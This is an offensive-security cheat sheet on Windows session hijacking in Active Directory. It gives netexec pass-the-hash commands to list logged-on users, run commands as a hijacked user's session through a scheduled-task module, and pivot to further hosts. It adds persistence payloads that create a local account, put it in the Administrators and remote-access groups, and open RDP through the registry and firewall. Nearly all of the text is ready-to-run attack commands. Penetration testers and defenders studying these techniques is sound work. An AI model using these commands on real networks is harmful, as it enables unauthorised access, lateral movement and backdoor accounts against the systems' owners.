Session Hijack
Windows
Session hijacking in Windows is a powerfull and easy way to pivot deeper into the AD environment.
Find logged in users
## Remotely using `netexec`
$ netexec smb <target> -u Administrator -H :<pw-hash> --local-auth --loggedon-users
...
SMB <target> 445 <hostname> [+] Enumerated logged_on users
SMB <target> 445 <hostname> DOM\username logon_server: DC.DOM.LOCAL
## Locally using cmd/powershell
> query user /server:127.0.0.1
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
void console 2 Active none 2024-10-14 07:29
> qwinsta /server:127.0.0.1
SESSIONNAME USERNAME ID STATE TYPE DEVICE
console void 2 ActiveBase command
## Execute command on target host
netexec smb <target> -u Administrator -H :<pw-hash> --local-auth -M schtask_as -o USER=<user-to-hijack> CMD="powershell.exe \"<command>\""
## Execute command on new target host
netexec smb <target> -u Administrator -H :<pw-hash> --local-auth -M schtask_as -o USER=<user-to-hijack> CMD="powershell.exe \"Invoke-Command -ComputerName <new-target-host> -ScriptBlock {<command>}\""Usefull payloads
## Create new local user
net user <username> <password> /add
## Add to groups
net localgroup Administrators <username> /add
net localgroup 'Remote Desktop Users' <username> /add
net localgroup 'Remote Management Users' <username> /add
## Enable RDP
reg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name='allow RemoteDesktop' dir=in protocol=TCP localport=3389 action=allowWeb
Session cookies, find them and use them.
Last updated